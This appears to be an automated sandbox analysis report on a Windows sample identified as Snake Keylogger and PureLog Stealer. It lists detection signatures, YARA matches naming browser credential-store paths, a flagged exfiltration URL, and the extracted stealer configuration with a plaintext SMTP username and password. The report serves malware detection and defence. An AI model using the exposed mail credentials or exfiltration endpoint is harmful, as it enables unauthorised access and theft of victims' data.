Edit tour

Windows Analysis Report
DEKONT.exe

Overview

General Information

Sample name:	DEKONT.exe
Analysis ID:	1430860
MD5:	384c4da2b75f4c7a1fa5585bc07634e6
SHA1:	27d368536af080b92d543f9c24af8596cc0edd6d
SHA256:	8980e6e2628b4103f4e3e0b01365a5e9a7df6e38c067c93633371c94b3d5dd34
Tags:	exe
Infos:

Detection

PureLog Stealer, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DEKONT.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\DEKONT.exe" MD5: 384C4DA2B75F4C7A1FA5585BC07634E6)

DEKONT.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\DEKONT.exe" MD5: 384C4DA2B75F4C7A1FA5585BC07634E6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x147ab:$a1: get_encryptedPassword 0x14aa1:$a2: get_encryptedUsername 0x145b7:$a3: get_timePasswordChanged 0x146b2:$a4: get_passwordField 0x147c1:$a5: set_encryptedPassword 0x15da8:$a7: get_logins 0x15d0b:$a10: KeyLoggerEventArgs 0x159a4:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18184:$x1: $%SMTPDV$ 0x181e8:$x2: $#TheHashHere%& 0x1983b:$x3: %FTPDV$ 0x1992f:$x4: $%TelegramDv$ 0x159a4:$x5: KeyLoggerEventArgs 0x15d0b:$x5: KeyLoggerEventArgs 0x1985f:$m2: Clipboard Logs ID 0x19a2b:$m2: Screenshot Logs ID 0x19af7:$m2: keystroke Logs ID 0x19a03:$m4: \SnakeKeylogger\
00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x27441b:$a1: get_encryptedPassword 0x294e3b:$a1: get_encryptedPassword 0x2b565b:$a1: get_encryptedPassword 0x274711:$a2: get_encryptedUsername 0x295131:$a2: get_encryptedUsername 0x2b5951:$a2: get_encryptedUsername 0x274227:$a3: get_timePasswordChanged 0x294c47:$a3: get_timePasswordChanged 0x2b5467:$a3: get_timePasswordChanged 0x274322:$a4: get_passwordField 0x294d42:$a4: get_passwordField 0x2b5562:$a4: get_passwordField 0x274431:$a5: set_encryptedPassword 0x294e51:$a5: set_encryptedPassword 0x2b5671:$a5: set_encryptedPassword 0x275a18:$a7: get_logins 0x296438:$a7: get_logins 0x2b6c58:$a7: get_logins 0x27597b:$a10: KeyLoggerEventArgs 0x29639b:$a10: KeyLoggerEventArgs 0x2b6bbb:$a10: KeyLoggerEventArgs
00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x277df4:$x1: $%SMTPDV$ 0x298814:$x1: $%SMTPDV$ 0x2b9034:$x1: $%SMTPDV$ 0x277e58:$x2: $#TheHashHere%& 0x298878:$x2: $#TheHashHere%& 0x2b9098:$x2: $#TheHashHere%& 0x2794ab:$x3: %FTPDV$ 0x299ecb:$x3: %FTPDV$ 0x2ba6eb:$x3: %FTPDV$ 0x27959f:$x4: $%TelegramDv$ 0x299fbf:$x4: $%TelegramDv$ 0x2ba7df:$x4: $%TelegramDv$ 0x275614:$x5: KeyLoggerEventArgs 0x27597b:$x5: KeyLoggerEventArgs 0x296034:$x5: KeyLoggerEventArgs 0x29639b:$x5: KeyLoggerEventArgs 0x2b6854:$x5: KeyLoggerEventArgs 0x2b6bbb:$x5: KeyLoggerEventArgs 0x2794cf:$m2: Clipboard Logs ID 0x27969b:$m2: Screenshot Logs ID 0x279767:$m2: keystroke Logs ID
Process Memory Space: DEKONT.exe PID: 7384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DEKONT.exe PID: 7384	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: DEKONT.exe PID: 7384	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: DEKONT.exe PID: 7384	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26e8f:$a1: get_encryptedPassword 0x2709a:$a2: get_encryptedUsername 0x26cb8:$a3: get_timePasswordChanged 0x26da7:$a4: get_passwordField 0x26ea5:$a5: set_encryptedPassword 0x28cb5:$a7: get_logins 0x28c2d:$a10: KeyLoggerEventArgs 0x289e6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: DEKONT.exe PID: 7384	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x289e6:$x5: KeyLoggerEventArgs 0x28c2d:$x5: KeyLoggerEventArgs 0x29373:$x5: KeyLoggerEventArgs 0x296a7:$x5: KeyLoggerEventArgs 0x2af20:$m2: Clipboard Logs ID 0x2b000:$m2: Screenshot Logs ID 0x2b034:$m2: keystroke Logs ID 0x2afec:$m4: \SnakeKeylogger\
Process Memory Space: DEKONT.exe PID: 7564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DEKONT.exe PID: 7564	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: DEKONT.exe PID: 7564	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3dcbe:$a1: get_encryptedPassword 0x3dfaa:$a2: get_encryptedUsername 0x3dad4:$a3: get_timePasswordChanged 0x3dbcf:$a4: get_passwordField 0x3dcd4:$a5: set_encryptedPassword 0x40031:$a7: get_logins 0x3ff94:$a10: KeyLoggerEventArgs 0x3fc2d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: DEKONT.exe PID: 7564	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3fc2d:$x5: KeyLoggerEventArgs 0x3ff94:$x5: KeyLoggerEventArgs 0x40741:$x5: KeyLoggerEventArgs 0x40a75:$x5: KeyLoggerEventArgs 0x423b8:$m2: Clipboard Logs ID 0x42498:$m2: Screenshot Logs ID 0x424cc:$m2: keystroke Logs ID 0x42484:$m4: \SnakeKeylogger\
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.DEKONT.exe.4409970.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DEKONT.exe.5b20000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DEKONT.exe.4409970.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DEKONT.exe.5b20000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.DEKONT.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.DEKONT.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.DEKONT.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.DEKONT.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x149ab:$a1: get_encryptedPassword 0x14ca1:$a2: get_encryptedUsername 0x147b7:$a3: get_timePasswordChanged 0x148b2:$a4: get_passwordField 0x149c1:$a5: set_encryptedPassword 0x15fa8:$a7: get_logins 0x15f0b:$a10: KeyLoggerEventArgs 0x15ba4:$a11: KeyLoggerEventArgsEventHandler
3.2.DEKONT.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c33f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b571:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b9a4:$a4: \Orbitum\User Data\Default\Login Data 0x1c9e3:$a5: \Kometa\User Data\Default\Login Data
3.2.DEKONT.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1555d:$s1: UnHook 0x15564:$s2: SetHook 0x1556c:$s3: CallNextHook 0x15579:$s4: _hook
3.2.DEKONT.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18384:$x1: $%SMTPDV$ 0x183e8:$x2: $#TheHashHere%& 0x19a3b:$x3: %FTPDV$ 0x19b2f:$x4: $%TelegramDv$ 0x15ba4:$x5: KeyLoggerEventArgs 0x15f0b:$x5: KeyLoggerEventArgs 0x19a5f:$m2: Clipboard Logs ID 0x19c2b:$m2: Screenshot Logs ID 0x19cf7:$m2: keystroke Logs ID 0x19c03:$m4: \SnakeKeylogger\
0.2.DEKONT.exe.5056a70.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DEKONT.exe.5056a70.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DEKONT.exe.5056a70.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12bab:$a1: get_encryptedPassword 0x12ea1:$a2: get_encryptedUsername 0x129b7:$a3: get_timePasswordChanged 0x12ab2:$a4: get_passwordField 0x12bc1:$a5: set_encryptedPassword 0x141a8:$a7: get_logins 0x1410b:$a10: KeyLoggerEventArgs 0x13da4:$a11: KeyLoggerEventArgsEventHandler
0.2.DEKONT.exe.5056a70.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a53f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19771:$a3: \Google\Chrome\User Data\Default\Login Data 0x19ba4:$a4: \Orbitum\User Data\Default\Login Data 0x1abe3:$a5: \Kometa\User Data\Default\Login Data
0.2.DEKONT.exe.5056a70.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1375d:$s1: UnHook 0x13764:$s2: SetHook 0x1376c:$s3: CallNextHook 0x13779:$s4: _hook
0.2.DEKONT.exe.5056a70.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16584:$x1: $%SMTPDV$ 0x165e8:$x2: $#TheHashHere%& 0x17c3b:$x3: %FTPDV$ 0x17d2f:$x4: $%TelegramDv$ 0x13da4:$x5: KeyLoggerEventArgs 0x1410b:$x5: KeyLoggerEventArgs 0x17c5f:$m2: Clipboard Logs ID 0x17e2b:$m2: Screenshot Logs ID 0x17ef7:$m2: keystroke Logs ID 0x17e03:$m4: \SnakeKeylogger\
0.2.DEKONT.exe.5056a70.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DEKONT.exe.5056a70.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DEKONT.exe.5056a70.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DEKONT.exe.5056a70.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x149ab:$a1: get_encryptedPassword 0x353cb:$a1: get_encryptedPassword 0x55beb:$a1: get_encryptedPassword 0x14ca1:$a2: get_encryptedUsername 0x356c1:$a2: get_encryptedUsername 0x55ee1:$a2: get_encryptedUsername 0x147b7:$a3: get_timePasswordChanged 0x351d7:$a3: get_timePasswordChanged 0x559f7:$a3: get_timePasswordChanged 0x148b2:$a4: get_passwordField 0x352d2:$a4: get_passwordField 0x55af2:$a4: get_passwordField 0x149c1:$a5: set_encryptedPassword 0x353e1:$a5: set_encryptedPassword 0x55c01:$a5: set_encryptedPassword 0x15fa8:$a7: get_logins 0x369c8:$a7: get_logins 0x571e8:$a7: get_logins 0x15f0b:$a10: KeyLoggerEventArgs 0x3692b:$a10: KeyLoggerEventArgs 0x5714b:$a10: KeyLoggerEventArgs
0.2.DEKONT.exe.5056a70.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c33f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd5f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d57f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b571:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bf91:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c7b1:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b9a4:$a4: \Orbitum\User Data\Default\Login Data 0x3c3c4:$a4: \Orbitum\User Data\Default\Login Data 0x5cbe4:$a4: \Orbitum\User Data\Default\Login Data 0x1c9e3:$a5: \Kometa\User Data\Default\Login Data 0x3d403:$a5: \Kometa\User Data\Default\Login Data 0x5dc23:$a5: \Kometa\User Data\Default\Login Data
0.2.DEKONT.exe.5056a70.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1555d:$s1: UnHook 0x35f7d:$s1: UnHook 0x5679d:$s1: UnHook 0x15564:$s2: SetHook 0x35f84:$s2: SetHook 0x567a4:$s2: SetHook 0x1556c:$s3: CallNextHook 0x35f8c:$s3: CallNextHook 0x567ac:$s3: CallNextHook 0x15579:$s4: _hook 0x35f99:$s4: _hook 0x567b9:$s4: _hook
0.2.DEKONT.exe.5056a70.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18384:$x1: $%SMTPDV$ 0x38da4:$x1: $%SMTPDV$ 0x595c4:$x1: $%SMTPDV$ 0x183e8:$x2: $#TheHashHere%& 0x38e08:$x2: $#TheHashHere%& 0x59628:$x2: $#TheHashHere%& 0x19a3b:$x3: %FTPDV$ 0x3a45b:$x3: %FTPDV$ 0x5ac7b:$x3: %FTPDV$ 0x19b2f:$x4: $%TelegramDv$ 0x3a54f:$x4: $%TelegramDv$ 0x5ad6f:$x4: $%TelegramDv$ 0x15ba4:$x5: KeyLoggerEventArgs 0x15f0b:$x5: KeyLoggerEventArgs 0x365c4:$x5: KeyLoggerEventArgs 0x3692b:$x5: KeyLoggerEventArgs 0x56de4:$x5: KeyLoggerEventArgs 0x5714b:$x5: KeyLoggerEventArgs 0x19a5f:$m2: Clipboard Logs ID 0x19c2b:$m2: Screenshot Logs ID 0x19cf7:$m2: keystroke Logs ID
0.2.DEKONT.exe.4ff4650.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DEKONT.exe.4ff4650.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DEKONT.exe.4ff4650.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DEKONT.exe.4ff4650.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76dcb:$a1: get_encryptedPassword 0x977eb:$a1: get_encryptedPassword 0xb800b:$a1: get_encryptedPassword 0x770c1:$a2: get_encryptedUsername 0x97ae1:$a2: get_encryptedUsername 0xb8301:$a2: get_encryptedUsername 0x76bd7:$a3: get_timePasswordChanged 0x975f7:$a3: get_timePasswordChanged 0xb7e17:$a3: get_timePasswordChanged 0x76cd2:$a4: get_passwordField 0x976f2:$a4: get_passwordField 0xb7f12:$a4: get_passwordField 0x76de1:$a5: set_encryptedPassword 0x97801:$a5: set_encryptedPassword 0xb8021:$a5: set_encryptedPassword 0x783c8:$a7: get_logins 0x98de8:$a7: get_logins 0xb9608:$a7: get_logins 0x7832b:$a10: KeyLoggerEventArgs 0x98d4b:$a10: KeyLoggerEventArgs 0xb956b:$a10: KeyLoggerEventArgs
0.2.DEKONT.exe.4ff4650.9.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x7e75f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x9f17f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xbf99f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7d991:$a3: \Google\Chrome\User Data\Default\Login Data 0x9e3b1:$a3: \Google\Chrome\User Data\Default\Login Data 0xbebd1:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ddc4:$a4: \Orbitum\User Data\Default\Login Data 0x9e7e4:$a4: \Orbitum\User Data\Default\Login Data 0xbf004:$a4: \Orbitum\User Data\Default\Login Data 0x7ee03:$a5: \Kometa\User Data\Default\Login Data 0x9f823:$a5: \Kometa\User Data\Default\Login Data 0xc0043:$a5: \Kometa\User Data\Default\Login Data
0.2.DEKONT.exe.4ff4650.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x7797d:$s1: UnHook 0x9839d:$s1: UnHook 0xb8bbd:$s1: UnHook 0x77984:$s2: SetHook 0x983a4:$s2: SetHook 0xb8bc4:$s2: SetHook 0x7798c:$s3: CallNextHook 0x983ac:$s3: CallNextHook 0xb8bcc:$s3: CallNextHook 0x77999:$s4: _hook 0x983b9:$s4: _hook 0xb8bd9:$s4: _hook
0.2.DEKONT.exe.4ff4650.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7a7a4:$x1: $%SMTPDV$ 0x9b1c4:$x1: $%SMTPDV$ 0xbb9e4:$x1: $%SMTPDV$ 0x7a808:$x2: $#TheHashHere%& 0x9b228:$x2: $#TheHashHere%& 0xbba48:$x2: $#TheHashHere%& 0x7be5b:$x3: %FTPDV$ 0x9c87b:$x3: %FTPDV$ 0xbd09b:$x3: %FTPDV$ 0x7bf4f:$x4: $%TelegramDv$ 0x9c96f:$x4: $%TelegramDv$ 0xbd18f:$x4: $%TelegramDv$ 0x77fc4:$x5: KeyLoggerEventArgs 0x7832b:$x5: KeyLoggerEventArgs 0x989e4:$x5: KeyLoggerEventArgs 0x98d4b:$x5: KeyLoggerEventArgs 0xb9204:$x5: KeyLoggerEventArgs 0xb956b:$x5: KeyLoggerEventArgs 0x7be7f:$m2: Clipboard Logs ID 0x7c04b:$m2: Screenshot Logs ID 0x7c117:$m2: keystroke Logs ID
0.2.DEKONT.exe.4f92230.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DEKONT.exe.4f92230.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DEKONT.exe.4f92230.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DEKONT.exe.4f92230.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd91eb:$a1: get_encryptedPassword 0xf9c0b:$a1: get_encryptedPassword 0x11a42b:$a1: get_encryptedPassword 0xd94e1:$a2: get_encryptedUsername 0xf9f01:$a2: get_encryptedUsername 0x11a721:$a2: get_encryptedUsername 0xd8ff7:$a3: get_timePasswordChanged 0xf9a17:$a3: get_timePasswordChanged 0x11a237:$a3: get_timePasswordChanged 0xd90f2:$a4: get_passwordField 0xf9b12:$a4: get_passwordField 0x11a332:$a4: get_passwordField 0xd9201:$a5: set_encryptedPassword 0xf9c21:$a5: set_encryptedPassword 0x11a441:$a5: set_encryptedPassword 0xda7e8:$a7: get_logins 0xfb208:$a7: get_logins 0x11ba28:$a7: get_logins 0xda74b:$a10: KeyLoggerEventArgs 0xfb16b:$a10: KeyLoggerEventArgs 0x11b98b:$a10: KeyLoggerEventArgs
0.2.DEKONT.exe.4f92230.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xd9d9d:$s1: UnHook 0xfa7bd:$s1: UnHook 0x11afdd:$s1: UnHook 0xd9da4:$s2: SetHook 0xfa7c4:$s2: SetHook 0x11afe4:$s2: SetHook 0xd9dac:$s3: CallNextHook 0xfa7cc:$s3: CallNextHook 0x11afec:$s3: CallNextHook 0xd9db9:$s4: _hook 0xfa7d9:$s4: _hook 0x11aff9:$s4: _hook
0.2.DEKONT.exe.4f92230.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xdcbc4:$x1: $%SMTPDV$ 0xfd5e4:$x1: $%SMTPDV$ 0x11de04:$x1: $%SMTPDV$ 0xdcc28:$x2: $#TheHashHere%& 0xfd648:$x2: $#TheHashHere%& 0x11de68:$x2: $#TheHashHere%& 0xde27b:$x3: %FTPDV$ 0xfec9b:$x3: %FTPDV$ 0x11f4bb:$x3: %FTPDV$ 0xde36f:$x4: $%TelegramDv$ 0xfed8f:$x4: $%TelegramDv$ 0x11f5af:$x4: $%TelegramDv$ 0xda3e4:$x5: KeyLoggerEventArgs 0xda74b:$x5: KeyLoggerEventArgs 0xfae04:$x5: KeyLoggerEventArgs 0xfb16b:$x5: KeyLoggerEventArgs 0x11b624:$x5: KeyLoggerEventArgs 0x11b98b:$x5: KeyLoggerEventArgs 0xde29f:$m2: Clipboard Logs ID 0xde46b:$m2: Screenshot Logs ID 0xde537:$m2: keystroke Logs ID
Click to see the 32 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DEKONT.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 16%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for submitted file

Source: DEKONT.exe	ReversingLabs: Detection: 44%
Source: DEKONT.exe	Virustotal: Detection: 47%			Perma Link

Machine Learning detection for sample

Source: DEKONT.exe

Joe Sandbox ML: detected

Source: DEKONT.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49725 version: TLS 1.2

Source: DEKONT.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: YaaO.pdbSHA256 source: DEKONT.exe
Source:	Binary string: YaaO.pdb source: DEKONT.exe

Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_05972E10
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_05972E08
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_05972880
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_07AB1C08
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_07AB24A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07AB24A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_07AB2495
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07AB2495
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 07ABFA6Ah	0_2_07ABF1EC
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then xor edx, edx	0_2_07AB1FC5
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then xor edx, edx	0_2_07AB1FD0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_07AB1D6C
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07AB1D6C
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_07AB1D78
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_07AB1D78
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_07AB1BFD
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 02DCF7A1h	3_2_02DCF4E8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_02DCEA08
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 02DCFBF9h	3_2_02DCF941
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2DDC1h	3_2_05B2DB18
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B22658h	3_2_05B22586
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B22091h	3_2_05B21DE0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B217D1h	3_2_05B21520
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2F7D1h	3_2_05B2F528
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2C809h	3_2_05B2C560
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2EF21h	3_2_05B2EC78
